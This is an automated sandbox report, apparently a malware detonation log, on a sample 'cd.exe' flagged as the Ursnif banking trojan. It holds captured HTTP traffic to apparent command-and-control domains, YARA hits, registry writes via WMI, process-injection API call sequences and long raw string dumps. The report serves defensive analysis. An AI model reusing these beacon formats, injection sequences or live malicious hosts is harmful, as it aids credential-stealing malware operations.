              Source: global trafficHTTP traffic detected: GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: gertrk.comCookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gertrk.comConnection: Keep-AliveCookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
              Source: global trafficHTTP traffic detected: GET /?gws_rd=ssl HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com
              Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
              Source: global trafficHTTP traffic detected: GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
              Source: global trafficHTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
              Source: global trafficHTTP traffic detected: GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: menehleibe.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: menehleibe.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              System Summary:

              barindex
              Writes or reads registry keys via WMIShow sources
              Source: C:\Users\user\Desktop\cd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMIShow sources
              Source: C:\Users\user\Desktop\cd.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: cd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040323C1_2_0040323C
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,1_2_00401873
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040171A NtMapViewOfSection,RtlNtStatusToDosError,1_2_0040171A
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040202A NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,1_2_0040202A
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004022D1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,1_2_004022D1
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004020E9 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,memcpy,1_2_004020E9
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00402F98 memset,memcpy,NtSetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,GetCalendarWeekNumber,GetLastError,1_2_00402F98
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401646 NtGetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,1_2_00401646
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00402550 NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,LdrInitializeThunk,LdrInitializeThunk,memcpy,1_2_00402550
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040345D NtQueryVirtualMemory,1_2_0040345D
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004018E5 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_004018E5
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004031F0 NtGetContextThread,1_2_004031F0
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004012A3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_004012A3
              Source: cd.exeBinary or memory string: zD%s\service_log.txtERROR! %s %s : %s%s\StringFileInfo\040904b0\OriginalFilename\installpath_SkipServiceVerificationChecks%s\bin\service_minimum_versions.vdf%s\service_minimum_versions.vdfVersion file missing or corrupt: %s vs cd.exe
              Source: cd.exeBinary or memory string: M\VarFileInfo\Translation\D:\B\T\Imports\Open\Chrome\Chrome\src\base\file_version_info_win.ccCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls vs cd.exe
              Source: cd.exeStatic PE information: Number of sections : 71 > 10
              Source: cd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: cd.exeReversingLabs: Detection: 60%
              Source: cd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\cd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\cd.exe 'C:\Users\user\Desktop\cd.exe'
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Users\user\Desktop\cd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.datJump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMPJump to behavior
              Source: cd.exeBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServer\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
              Source: cd.exeBinary string: HNtOpenKeyExNtCreateKey: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_dispatcher.ccConsider modifying policy using this policy rule: REG_ALLOW_ANYNtOpenKey: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
              Source: cd.exeBinary string: A@\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
              Source: cd.exeBinary string: A4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureState
              Source: cd.exeBinary string: zl`l@`l@aFatlTraceGeneral\??\\Device\\\?\UNC\\??\UNC\/?/UNC/atlTraceCOM\?\UNC\\??\pipe\\??\mailslot\atlTraceQI\\?\\\.\\\atlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib:Invalid DateTimeInvalid DateTimeSpanMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exception (cont.) (cont.)Math overflow exceptionrSOFTWARE\Adobe\AcroPerfMath overflow exceptionbLaunchTimingMath overflow exceptionbExtendedProfilingMath overflow exceptionbDetailedHandlerProfilingMath overflow exceptiontOutputDirMath overflow exceptionMath overflow exceptionlabeled blockMath overflow exceptionMath overflow exceptionbFilemonMarkersrP[h`+Md[h
              Source: cd.exeBinary string: FNtCreateSection: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_dispatcher.ccreal_path: NtOpenSection: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
              Source: cd.exeBinary string: M\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage
              Source: cd.exeBinary string: L\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser|acr|\FNP_Act_Installer.dll|acr|\SynchronizerApp.exe|acr|\Javascripts\JSByteCodeWin.bin|acr|\AdobeUpdater.dll|sys|\ddraw.dll|sys|\dciman32.dllAdobeAcrobatSpeedLaunchCmdWndSOFTWARE\Adobe\Adobe Acrobat\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!
              Source: cd.exeBinary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F]P
              Source: cd.exeBinary string: \\\?\.dll.apibad allocationSOFTWARE\Adobe\Adobe Acrobat\DC\InstallPathSOFTWARE\Adobe\Acrobat Reader\DC\InstallPath|ci||cpg||cc||cpt||cpe||cf||csu||cr||cst||cbb||csm||cdd||cdr||cn||cnh||cfo||ct||ccsm||ccp||ccs||ccd||cad||cph||cas||cca||ccf||cic||cco||ch||cmm||cla||ccad||cpf||cmp||cpfc||ccdc||crs||crl||ccam||cat||tmp||win||sys||root||ladl||acr||acrp||rdr||rdrp|An update to Acrobat or Reader is being installed. Please wait until installation is complete and then try again.atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinAcroUnloadStubMsgAcroReloadStubMsgAcrobatUnloadMsgAcrobatReloadMsgAcroStubUnloadWClassAcroStubUnloadWClassAcroStubUnloadWClassatlTraceNotImplatlTraceAllocationSOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUISOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUIAcroUnloadStubMsgAcroReloadStubMsgatlTraceExceptionAcroRd32.dllAcrobat.dllAcRd32_D.dllAcroDbg.dllSOFTWARE\Adobe\Adobe Acrobat\DC\appvatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibAcrobat.dllAcrobat32OL.dllSoftware\Adobe\Adobe Acrobat\DC\SecurityDEPSoftware\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableATL7Compatkernel32.dllGetProcessDEPPolicykernel32.dllSetProcessDEPPolicyntdll.dllNtSetInformationProcess\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt /if/if pdfshell_prev/CRlaunchCEFInLowIntegrityAdobeAcrobatSpeedLaunchCmdWndAdobeReaderSpeedLaunchCmdWndAcrobat Viewer Safe DDEacrobat_sbxEDIT/if/CR/ac/actuser32.dllSetProcessDPIAwareacrobatres.dllAXE8SharedExpat.dll/dllLoad AppInitEventbProtectedModeSOFTWARE\Policies\Adobe\Adobe Acrobat\DCbIPMTurnedPMONbLastExitNormaliForceExitReasonSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\ExitSectionSoftware\Adobe\Adobe Acrobat\DC\ExitSectioniPMSilentOffiNumSessionsSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegediSessionThresholdiPMSilentOffSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbProtectedMode\x86\Acrobat\Acrobat.exe/dllLoadbLTEnableDLLOptimizationAdobe AcrobatSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownDC_AcroAppTimerAcroExe load doneacrord32_super_sbx/if/ifpdfshell_prev/slModebAllowWindowCreationOnBrowserSoftware\Adobe\Adobe Acrobat\DC\PrivilegedUseSandboxModalWndReparenting/slModeopenSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliSLExitTimeHighPartiSLExitTimeLowPartFatal ErrorAcrobat failed to load its Core DLLhttps://helpx.adobe.com/acrobat/kb/acrobat-failed-load-core-dll.htmlAcroWinMainSandbox\??\AcroviewA21CALS_PreflightDdeService\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device
              Source: cd.exeBinary string: fH', pattern = ', semantics = , subsystem = error = Failed to add sandbox rule.D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sandbox_policy_base.ccinterceptions setup failed - error:process initialization failed - error:g_shared_delayed_integrity_levelg_shared_delayed_mitigationsCreateAppContainerToken\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F]
              Source: cd.exeBinary string: #O\\.\\\?\CreateNamedPipe: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_dispatcher.ccname: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\invalid stoull argumentstoull argument out of range
              Source: cd.exeBinary string: Zh#M\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\dZh0
              Source: cd.exeBinary string: DEST\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Embed SourceEmbedded ObjectatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibCONTENTSPDFCONTENTSCONTENTS\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibGetOpenFileNameW`
              Source: cd.exeBinary string: M\Device\Mup\Device\\SystemRoot\\Device\LanmanRedirector\
              Source: cd.exeBinary string: NBrokerEvent0x%XFailed to construct job object for sandbox process - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\broker_services.ccFailed to construct restricted tokens for sandbox process - error:4277065__security_cookieg_sandbox_winsta_handleg_sandbox_desktop_handleg_sandbox_main_thread_idg_broker_already_in_job_that_prohibits_breakawayg_is_compute_only_sandboxg_under_appv_virtualizationg_in_pm_appcontainerg_in_pv_appcontainer%sg_appcontainer_named_object_directory_handleg_appcontainer_object_dirg_broker_process_idFailed to add target - error:AcroBrokerSessionEndMsgListenerClassAcroBrokerSessionEndMsgListener\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: \\\?\.dll.apibad allocationSOFTWARE\Adobe\Adobe Acrobat\DC\InstallPathSOFTWARE\Adobe\Acrobat Reader\DC\InstallPath|ci||cpg||cc||cpt||cpe||cf||csu||cr||cst||cbb||csm||cdd||cdr||cn||cnh||cfo||ct||ccsm||ccp||ccs||ccd||cad||cph||cas||cca||ccf||cic||cco||ch||cmm||cla||ccad||cpf||cmp||cpfc||ccdc||crs||crl||ccam||cat||tmp||win||sys||root||ladl||acr||acrp||rdr||rdrp|An update to Acrobat or Reader is being installed. Please wait until installation is complete and then try again.atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinAcroUnloadStubMsgAcroReloadStubMsgAcrobatUnloadMsgAcrobatReloadMsgAcroStubUnloadWClassAcroStubUnloadWClassAcroStubUnloadWClassatlTraceNotImplatlTraceAllocationSOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUISOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUIAcroUnloadStubMsgAcroReloadStubMsgatlTraceExceptionAcroRd32.dllAcrobat.dllAcRd32_D.dllAcroDbg.dllSOFTWARE\Adobe\Adobe Acrobat\DC\appvatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibAcrobat.dllAcrobat32OL.dllAcroRd32.dllSoftware\Adobe\Adobe Acrobat\DC\SecurityDEPSoftware\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableATL7Compatkernel32.dllGetProcessDEPPolicykernel32.dllSetProcessDEPPolicyntdll.dllNtSetInformationProcessAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt /if/if pdfshell_prev/CRlaunchCEFInLowIntegrityAdobeAcrobatSpeedLaunchCmdWndAdobeReaderSpeedLaunchCmdWndAcrobat Viewer Safe DDEacrord32_sbxEDIT/if/CR/ac/actuser32.dllSetProcessDPIAware/pass bWasUserPassThroughedSoftware\Adobe\Acrobat Reader\DC\AVGeneralacrord32res.dllAXE8SharedExpat.dll/dllLoad AppInitEvent/dllLoadbLTEnableDLLOptimizationAcroExe load doneSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownDCAcrobat Reader_AcroAppTimeracrord32_super_sbx/if/ifpdfshell_prev/slModebAllowWindowCreationOnBrowserUseSandboxModalWndReparentingSoftware\Adobe\Acrobat Reader\DC\Privileged/slModeSoftware\Adobe\Acrobat Reader\DC\AVGeneraliSLExitTimeHighPartiSLExitTimeLowPartFatal ErrorAcrobat failed to load its Core 